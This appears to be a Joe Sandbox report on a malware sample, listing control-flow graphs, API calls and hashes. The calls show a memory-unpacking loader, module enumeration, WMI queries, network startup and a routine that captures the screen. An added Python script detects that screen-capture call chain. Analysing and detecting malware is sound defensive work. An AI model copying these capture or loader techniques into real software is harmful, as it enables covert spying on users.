• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: MO$MO
• API String ID: 0-3148518880
• Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
• Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
• Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
• Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 307 4402c0-4402f2 LdrInitializeThunk
APIs
• LdrInitializeThunk.NTDLL(0044316E,00655ED0,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 216003c-2160047 1 216004c-2160263 call 2160a3f call 2160e0f call 2160d90 VirtualAlloc 0->1 2 2160049 0->2 17 2160265-2160289 call 2160a69 1->17 18 216028b-2160292 1->18 2->1 23 21602ce-21603c2 VirtualProtect call 2160cce call 2160ce7 17->23 20 21602a1-21602b0 18->20 22 21602b2-21602cc 20->22 20->23 22->20 29 21603d1-21603e0 23->29 30 21603e2-2160437 call 2160ce7 29->30 31 2160439-21604b8 VirtualFree 29->31 30->29 33 21605f4-21605fe 31->33 34 21604be-21604cd 31->34 37 2160604-216060d 33->37 38 216077f-2160789 33->38 36 21604d3-21604dd 34->36 36->33 42 21604e3-2160505 LoadLibraryA 36->42 37->38 43 2160613-2160637 37->43 40 21607a6-21607b0 38->40 41 216078b-21607a3 38->41 44 21607b6-21607cb 40->44 45 216086e-21608be LoadLibraryA 40->45 41->40 46 2160517-2160520 42->46 47 2160507-2160515 42->47 48 216063e-2160648 43->48 49 21607d2-21607d5 44->49 52 21608c7-21608f9 45->52 50 2160526-2160547 46->50 47->50 48->38 51 216064e-216065a 48->51 53 21607d7-21607e0 49->53 54 2160824-2160833 49->54 55 216054d-2160550 50->55 51->38 56 2160660-216066a 51->56 59 2160902-216091d 52->59 60 21608fb-2160901 52->60 61 21607e4-2160822 53->61 62 21607e2 53->62 58 2160839-216083c 54->58 63 2160556-216056b 55->63 64 21605e0-21605ef 55->64 57 216067a-2160689 56->57 67 2160750-216077a 57->67 68 216068f-21606b2 57->68 58->45 69 216083e-2160847 58->69 60->59 61->49 62->54 65 216056f-216057a 63->65 66 216056d 63->66 64->36 70 216057c-2160599 65->70 71 216059b-21605bb 65->71 66->64 67->48 72 21606b4-21606ed 68->72 73 21606ef-21606fc 68->73 74 216084b-216086c 69->74 75 2160849 69->75 83 21605bd-21605db 70->83 71->83 72->73 77 21606fe-2160748 73->77 78 216074b 73->78 74->58 75->45 77->78 78->57 83->55
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0216024D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction ID: b5ed4fde32294e7aa38a0e3cc414e3c7c438f795dd78e2fb808d139c398ac453
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA95CF14

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 233 60378e-6037a7 234 6037a9-6037ab 233->234 235 6037b2-6037be CreateToolhelp32Snapshot 234->235 236 6037ad 234->236 237 6037c0-6037c6 235->237 238 6037ce-6037db Module32First 235->238 236->235 237->238 243 6037c8-6037cc 237->243 239 6037e4-6037ec 238->239 240 6037dd-6037de call 60344d 238->240 244 6037e3 240->244 243->234 243->238 244->239
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006037B6
                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 006037D6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp, Offset: 00602000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_602000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction ID: 5dff0cbc1e9144583d868a154a26becd755ad7a6086854f724299927ce494f1f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAF0F6B1240720ABD7243BF5AC8CBAFB2EDAF49726F10052CF642956C0DB70ED454A65

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 246 2160e0f-2160e24 SetErrorMode * 2 247 2160e26 246->247 248 2160e2b-2160e2c 246->248 247->248
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,02160223,?,?), ref: 02160E19
                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,02160223,?,?), ref: 02160E1E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction ID: e9c0ddff7ad8c06008852dff5cd4673f15b5d7d0f17db3ceebe3952d7cf3b5ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53D0123154512877D7002AD4DC0DBDD7B1CDF09B66F108011FB0DD9080C770954046E5

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 281 440260-440271 282 4402a5-4402a6 call 43eb40 281->282 283 440286-440298 call 441850 RtlReAllocateHeap 281->283 284 440278-44027f 281->284 285 44029a-4402a3 call 43eb20 281->285 290 4402ab-4402ae 282->290 292 4402b0-4402b2 283->292 284->282 284->283 285->292 290->292
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B9C7,00000000,00000001), ref: 00440292
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
                                                                                                                                                                                                                                                  • Instruction ID: c7e132dbbf166c87dd4ca7ba8e526d96017081e21b1d4d371130b4eff19db060
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3E02B32404310ABD2026F397C06B177674EFC6715F05087AF50156151DB38F811C5DE

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 293 40ab12-40ab5b call 441c40 * 2 WSAStartup
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202), ref: 0040AB46
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Startup
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 724789610-0
                                                                                                                                                                                                                                                  • Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                                                                                                                                                                  • Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 299 43eb40-43eb4c 300 43eb53-43eb54 299->300 301 43eb55-43eb67 call 441850 RtlFreeHeap 299->301
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                                  • Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                                                                                                                                                                  • Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

Control-flow Graph: block 304 (4404b1-4404c9: GetForegroundWindow, call 4421e0) -> block 306 (4404ce-4404e8)
APIs
• GetForegroundWindow.USER32 ref: 004404BF
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
• Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
• Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
• Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

Control-flow Graph: block 308 (43eb20-43eb37: call 441850, RtlAllocateHeap)
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
• Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
• Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
• Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0060349E
Memory Dump Source
• Source File: 00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp, Offset: 00602000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_602000_EB86.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: a444563d3947e0ca86d8e8bd477876e5d427e3eef385bb0893b12c7c12c59049
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 09113C79A40208EFDB01DF98C985E99BBF5AF08351F058094F9489B362D771EA50DF84
APIs
• CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
• SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
• CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
• SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
• SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
• VariantInit.OLEAUT32(?), ref: 0043BF3E
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID: AllocString$BlanketCreateInitInstanceProxyVariant
• String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
• API String ID: 65563702-2807872674
• Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
• Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
• Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
• Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96
APIs
• CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0219BF33
• SysAllocString.OLEAUT32(37C935C6), ref: 0219BFAD
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0219BFEB
• SysAllocString.OLEAUT32(37C935C6), ref: 0219C050
• SysAllocString.OLEAUT32(37C935C6), ref: 0219C137
• VariantInit.OLEAUT32(?), ref: 0219C1A5
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID: AllocString$BlanketCreateInitInstanceProxyVariant
• String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
• API String ID: 65563702-2807872674
• Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
• Instruction ID: 2ea05d585345a48718c2f277d08ab2f09f1805a6f65375db0bb7231e1dc269c3
• Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
• Instruction Fuzzy Hash: AE52EF726483408BD724CF28C8917ABBBE1EFCA314F188A2DE5D587391D775D806CB92
APIs
• GetDC.USER32(00000000), ref: 00436989
• GetSystemMetrics.USER32(0000004C), ref: 00436999
• GetSystemMetrics.USER32(0000004D), ref: 004369A1
• GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
• GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
• DeleteObject.GDI32(00000000), ref: 004369C1
• CreateCompatibleDC.GDI32(00000000), ref: 004369D0
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
• SelectObject.GDI32(00000000,00000000), ref: 004369E7
• BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                                                                                                                                                                                                  • String ID: Y
                                                                                                                                                                                                                                                  • API String ID: 1298755333-3233089245
                                                                                                                                                                                                                                                  • Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                                                                                                                                                                  • Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B
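The API sequence recorded for the function at 004369A1 to 00436A0A is the standard GDI way of copying the screen into a memory bitmap, which is what the "Contains functionality to record screenshots" signature keys on: GetSystemMetrics(0x4D) is SM_YVIRTUALSCREEN, GetCurrentObject(hdc, 7) asks for OBJ_BITMAP, the 0x18 passed to GetObjectW is sizeof(BITMAP) on 32-bit Windows, and the 00CC0020 raster operation handed to BitBlt is SRCCOPY. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses trace lines in the report's own "Name.MODULE(args), ref: addr" shape, decodes those constants, and flags the CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt chain when it appears in order. The two embedded inputs are copied from API lists on this page (the screenshot routine above and the FreeLibrary routine further down, as a negative case); the chain definition and the constant tables are the example's own and cover only the constants listed in them.

```python
"""Parse Joe Sandbox 'APIs' trace lines and flag a GDI screen-capture call chain."""
import re
from dataclasses import dataclass
from typing import Optional

# Shape of one trace line, optionally prefixed with "Part of subcall function XXXXXXXX:".
API_LINE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# GetSystemMetrics indices (winuser.h) that describe desktop geometry.
SM_INDEX = {
    0: "SM_CXSCREEN", 1: "SM_CYSCREEN",
    76: "SM_XVIRTUALSCREEN", 77: "SM_YVIRTUALSCREEN",
    78: "SM_CXVIRTUALSCREEN", 79: "SM_CYVIRTUALSCREEN", 80: "SM_CMONITORS",
}
# BitBlt raster operations (wingdi.h); CAPTUREBLT is an OR-able flag, not a ROP.
ROP = {0x00CC0020: "SRCCOPY", 0x00EE0086: "SRCPAINT",
       0x008800C6: "SRCAND", 0x00330008: "NOTSRCCOPY"}
CAPTUREBLT = 0x40000000

# Ordered GDI32 chain that copies a device context into a memory bitmap.
CAPTURE_CHAIN = ["CreateCompatibleDC", "CreateCompatibleBitmap", "SelectObject", "BitBlt"]


@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # int per argument, None where the report shows "?"
    ref: int              # address of the call site
    subcall_of: Optional[int] = None


def parse_api_lines(text: str) -> list:
    """Turn the bullet lines of an 'APIs' list into ApiCall records; headings are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
        args = [None if a == "?" else int(a, 16) for a in raw]
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def decode_rop(value: int) -> str:
    base = value & ~CAPTUREBLT
    name = ROP.get(base, f"0x{base:08X}")
    return name + ("|CAPTUREBLT" if value & CAPTUREBLT else "")


def describe(call: ApiCall) -> str:
    """Human-readable decoding of the constants that matter for screen capture."""
    if call.api == "GetSystemMetrics" and call.args and call.args[0] is not None:
        return SM_INDEX.get(call.args[0], f"SM_{call.args[0]}")
    if call.api == "BitBlt" and len(call.args) == 9 and call.args[8] is not None:
        return decode_rop(call.args[8])  # 9th BitBlt parameter is the raster op
    return ""


def find_screen_capture(calls: list):
    """Return chain details if the GDI32 DC -> bitmap -> select -> BitBlt calls occur in order."""
    pos, hits = 0, {}
    for c in calls:
        if pos < len(CAPTURE_CHAIN) and c.module == "GDI32" and c.api == CAPTURE_CHAIN[pos]:
            hits[c.api] = c
            pos += 1
    if pos != len(CAPTURE_CHAIN):
        return None
    return {
        "refs": [hits[a].ref for a in CAPTURE_CHAIN],
        "bitblt_ref": hits["BitBlt"].ref,
        "rop": describe(hits["BitBlt"]),
        "metrics": [describe(c) for c in calls if c.api == "GetSystemMetrics"],
    }


# Input copied from the screenshot routine's API list on this page.
SCREENSHOT_BLOCK = """\
• GetSystemMetrics.USER32(0000004D), ref: 004369A1
• GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
• GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
• DeleteObject.GDI32(00000000), ref: 004369C1
• CreateCompatibleDC.GDI32(00000000), ref: 004369D0
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
• SelectObject.GDI32(00000000,00000000), ref: 004369E7
• BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
"""

# Input copied from the FreeLibrary routine's API list on this page (no capture chain).
FREELIBRARY_BLOCK = """\
• FreeLibrary.KERNEL32(?), ref: 00419CE7
• FreeLibrary.KERNEL32(?), ref: 00419D24
  • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00655ED0,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
"""

if __name__ == "__main__":
    for name, block in (("screenshot", SCREENSHOT_BLOCK), ("freelibrary", FREELIBRARY_BLOCK)):
        hit = find_screen_capture(parse_api_lines(block))
        print(name, "->", "no capture chain" if hit is None else
              f"BitBlt at {hit['bitblt_ref']:08X} with {hit['rop']}, metrics {hit['metrics']}")
```

The chain check deliberately ignores the GetCurrentObject/GetObjectW/DeleteObject calls, which only measure the source bitmap; a capture routine that sizes its bitmap from GetSystemMetrics alone still matches. An unresolved raster operation ("?" in the report) yields an empty `rop`, so treat that field as evidence only when it decodes.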
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
• API String ID: 237503144-2846770461
• Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
• Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
• Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
• Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8/d$8I>K$T`Sf$Wdz$&$$qs$uVw
• API String ID: 0-2973599404
• Opcode ID: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
• Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
• Opcode Fuzzy Hash: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
• Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: ~|$8/d$SP$if$pv$tj$vt
• API String ID: 3664257935-3249996398
• Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
• Instruction ID: ec28948933193ce4502e6cba0c223f9eeee13a7c1b364abab75eba6ad600e2eb
• Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
